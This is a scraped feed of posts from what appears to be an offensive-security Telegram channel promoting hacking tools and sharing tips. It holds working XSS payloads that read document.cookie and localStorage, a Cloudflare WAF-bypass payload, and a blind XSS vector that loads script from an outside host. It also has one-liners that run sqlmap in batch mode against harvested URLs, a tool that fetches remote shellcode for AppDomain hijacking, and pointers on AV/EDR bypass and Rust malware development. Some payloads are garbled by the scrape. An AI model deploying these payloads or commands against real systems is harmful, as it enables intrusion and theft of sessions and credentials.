BypassAV
This map lists the essential techniques to bypass anti-virus and EDR
💬
as a reminder: it is highly recommended to read the articles related to manual techniques rather than using open source tools which are more likely to be suspected by the anti-virus because of IOSs
😸 Github
⬇️ Download
🔒
#Pentest #AV #Bypass
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
This map lists the essential techniques to bypass anti-virus and EDR
as a reminder: it is highly recommended to read the articles related to manual techniques rather than using open source tools which are more likely to be suspected by the anti-virus because of IOSs
BugCod3#Pentest #AV #Bypass
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3⚡2🔥2👍1
ezXSS is an easy way for penetration testers and bug bounty hunters to test (blind) Cross Site Scripting.
ezXSS is a tool that is designed to help find and exploit cross-site noscripting (XSS) vulnerabilities. One of the key features of ezXSS is its ability to identify and exploit blind XSS vulnerabilities, which can be difficult to find using traditional methods.
Required:
Installation:
BugCod3#PHP #XSS #Blind #Pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5❤2⚡2👍1
This media is not supported in your browser
VIEW IN TELEGRAM
Chiasmodon is an OSINT (Open Source Intelligence) tool designed to assist in the process of gathering information about target domain. Its primary functionality revolves around searching for domain-related data, including domain emails, domain credentials (usernames and passwords), CIDRs (Classless Inter-Domain Routing), ASNs (Autonomous System Numbers), and subdomains. the tool allows users to search by domain, CIDR, ASN, email, username, password, or Google Play application ID.
📋 Output Customization: Choose the desired output format (text, JSON, or CSV) and specify the filename to save the search results.
pip install chiasmodon
chiasmodon_cli.py -h
BugCod3#OSINT #BugBounty #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡4🔥3👍2❤1
Learn the basics of burpsuite. Start using Burp with web applications.
⬇️ Download
#Burpsuite #Kalilinux #Cybersecurity
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
#Burpsuite #Kalilinux #Cybersecurity
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡3🔥2❤1
This is a python wrapper around the amazing KNOXSS API by Brute Logic. To use this tool (and the underlying API), you must have a valid KNOXSS API key. Don't have one? Go visit
https://knoxss.me and subscribe! This was inspired by the "knoxssme" tool by @edoardottt2, but developed to allow for greater options.NOTE: If you already have a `config.yml` file, it will not be overwritten. The file `config.yml.NEW` will be created in the same directory. If you need the new config, remove `config.yml` and rename `config.yml.NEW` back to `config.yml`.
pip install knoxnl
knoxnl -i "https://brutelogic.com.br/xss.php"
Or a file of URLs:
knoxnl -i ~/urls.txt
BugCod3#Python #Scanner #XSS #Knoxnl
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3⚡2❤1
Here's another Blind XSS vector!
Where 00 is your unique KNOXSS id.
If it fails with <Script it might pop with <Img in a multi reflection scenario!
#XSS
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
1"`/import(src)'<Script/Src=//X55.is?1=00><Img/OnLoad='`
Where 00 is your unique KNOXSS id.
If it fails with <Script it might pop with <Img in a multi reflection scenario!
#XSS
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4⚡2❤1
Payload:
#XSS
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
"%27%22()%26%25%3Cyes%3E%3C%2Fnoscript%3E%3Cnoscript%3Ealert%28document.domain%29%3C%2Fnoscript%3E"
#XSS
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2⚡2🔥2
Version 1.0.0 is available now
#OSINT #CyberSecurity #password
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
pip3 install -U chiasmodon #OSINT #CyberSecurity #password
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5🔥3⚡2
Rust for Malware Development
💬
Hello Nerds, This Repo is about using Rust for malware development and for low level stuffs.
👁🗨 Basics:
To Learn Rust -> Rust Book
Windows API [old]-(winapi)-> WinAPI
Windows API (by Official Microsoft) -> WinAPI
ntapi Crate -> NtAPI
Windows Internels -> Link
RedTeam Notes -> Link
WinAPI Imports to Test and Execute these Codes..
Tips for Rust Beginner: save this dependencies in Cargo.toml File.
😸 Github
⬇️ Download
🔒
#Rust #Malware #Dev
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Hello Nerds, This Repo is about using Rust for malware development and for low level stuffs.
To Learn Rust -> Rust Book
Windows API [old]-(winapi)-> WinAPI
Windows API (by Official Microsoft) -> WinAPI
ntapi Crate -> NtAPI
Windows Internels -> Link
RedTeam Notes -> Link
WinAPI Imports to Test and Execute these Codes..
[dependencies]
winapi = { version = "0.3", features = ["winuser", "debugapi","winerror", "wininet" , "winhttp" ,"synchapi","securitybaseapi","wincrypt","psapi", "tlhelp32", "heapapi","shellapi", "memoryapi", "processthreadsapi", "errhandlingapi", "winbase", "handleapi", "synchapi"] }
ntapi = "0.4.1"
user32-sys = "0.2.0"
Tips for Rust Beginner: save this dependencies in Cargo.toml File.
BugCod3#Rust #Malware #Dev
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡3🔥2❤1
SQLMap from Waybackurls
#Sqlmap #BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"#Sqlmap #BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡3❤2🔥2
Parameter: invitedby=
Payload=
Full_url=
#XSS #BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Payload=
%22%3E%3Cnoscript%3Ealert(document.cookie)%3C/noscript%3EFull_url=
https://site. com/?invitedby=%22%3E%3Cnoscript%3Ealert(document.cookie)%3C/noscript%3E#XSS #BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡4🔥3❤1👍1
xss oneliner command
⬇️ Download ( Tools )
🔒
🔒
#XSS #BugBounty #Oneliner #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
echo "testphp.vulnweb.com" | waybackurls | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|icon|pdf|noscript|txt|js)" | urldedupe -s | grep -IE "[?].*[&]?" | grep "=" | unew -p | pvreplace '<sCript>confirm(1)</sCript>, <noscript>confirm(1)</noscript>' | xsschecker -match '<sCript>confirm(1)</sCript>, <noscript>confirm(1)</noscript>' -vulnBugCod3 ( ZIP )LearnExploit ( BOT )#XSS #BugBounty #Oneliner #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4⚡2❤2
#Burpsuite #Pro #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5⚡2❤1🤣1
This media is not supported in your browser
VIEW IN TELEGRAM
🕵️♂️ Human-like Behavior Mimicking: To mimic human-like behavior and avoid detection by anti-bot mechanisms, the tool randomizes user agents for each request. This helps in making the requests appear more natural and reduces the likelihood of being flagged as automated activity.
cd Ominis-Osint
pip install -r requirements.txt
python3 Ominis.py
BugCod3#Python #Osint #Search #Engin #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡3🔥3❤2👍1
311138#Burpsuite #Pro #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡2🔥2❤1👍1
Tools to automate finding AppDomain hijacks and generating payloads from shellcode.
Run this tool on the target. It will search recursively in the
C:\ directory for .NET managed `.exe`s and test if the folder is writeable - indicating that the PE is AppDomainHijack-able.AutoDomainHijack.exe (--version | -h | --help)
-t, --target-name=<target-name> Name of the target managed .exe to hijack.
-n, --hijack-name=<hijack-name> Name of the hijacker .dll.
-u, --url=<url> URL of the remote shellcode to run.
-f, --file=<file> File containing the shellcode to embed.
-o, --output=<output> Full directory to write files to.
-e, --etw=<etw> Disable ETW. [default: true]
--version Prints version
-h, --help Show help message
nimble build
BugCod3#Hijack #Payload
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3⚡2❤1❤🔥1🤣1
MultCheck is a malware-analysis tool that can be used to test the detection of a file by multiple AV engines.
It is designed to be easy to use, and to be able to test multiple AV engines. It is also designed to be easy to extend, and to be able to add custom AV engines.
Run
go build under the root directory of the project.OR
cd src
# Build for Windows
## 64-bit
GOOS=windows GOARCH=amd64 go build -o ../bin/multcheck_x64.exe main.go
## 32-bit
GOOS=windows GOARCH=386 go build -o ../bin/multcheck_x32.exe main.go
MultCheck accepts a target file as an argument:
./multcheck <target_file>Different built-in scanners can be used by specifying the
-scanner flag: ./multcheck -scanner <scanner_name> <target_file>Custom scanners can be added by creating a configuration file and providing the path to the file through the
-scanner flag: ./multcheck -scanner <path_to_config_file> <target_file>BugCod3#GO #Malware #Analysis #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3⚡2🔥2
This payload can be used for Client Side Template injection and Reflected XSS, perhaps a code injection can be triggered in the background
Payload :
#BugBounty #Tips #Payload
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Payload :
'%3e%3cnoscript%3ealert(5*5)%3c%2fnoscript%3eejj4sbx5w4o#BugBounty #Tips #Payload
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10⚡2❤1
CloudFlare Payload
#Payload #Cloudflare #Pentest
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/A3l3_KA4
<noscript%0Aonauxclick=0;[1].some(confirm)//<noscript onload=alert%26%230000000040"")><noscript onx=() onload=(confirm)(1)><noscript onx=() onload=(confirm)(document.cookie)><noscript onx=() onload=(confirm)(JSON.stringify(localStorage))>#Payload #Cloudflare #Pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6🔥3⚡2👍1
Advanced SQL Injection for AWAE
Goal is to master SQL Injection Discovery, Detection and Exploitation
📊 Table of Content:
- Learning a lil' bit of SQL
- SQL Injection Methodology Overview
- MYSQL Injection Methodology
- MySQL Error or UNION Based SQLi
- Routed Queries (Advanced WAF Bypass for Error or UNION based MySQLi)
- WorkAround when UNION queires doesn't work (MySQL Error Based SQLi)
- The Alternative ways of using
- The Alternative ways of using
- The Alternative way of using
- MySQL Boolean Based Blind SQLi
- MySQL Time Based Blind SQLi
AND...
😸 Github
⬇️ Download
🔒
#Sql #Injection #AWAE
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Goal is to master SQL Injection Discovery, Detection and Exploitation
- Learning a lil' bit of SQL
- SQL Injection Methodology Overview
- MYSQL Injection Methodology
- MySQL Error or UNION Based SQLi
- Routed Queries (Advanced WAF Bypass for Error or UNION based MySQLi)
- WorkAround when UNION queires doesn't work (MySQL Error Based SQLi)
- The Alternative ways of using
AND/OR 0 in SQLi- The Alternative ways of using
NULL in SQLi- The Alternative way of using
WhiteSpace in SQLi- MySQL Boolean Based Blind SQLi
- MySQL Time Based Blind SQLi
AND...
BugCod3#Sql #Injection #AWAE
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡4🔥2❤1👍1